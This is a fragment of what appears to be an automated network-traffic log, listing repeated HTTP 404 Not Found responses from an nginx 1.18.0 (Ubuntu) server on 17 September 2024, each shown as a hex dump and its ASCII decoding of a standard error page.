                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:11:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:32 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:35 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:47 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:50 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:52 GMT
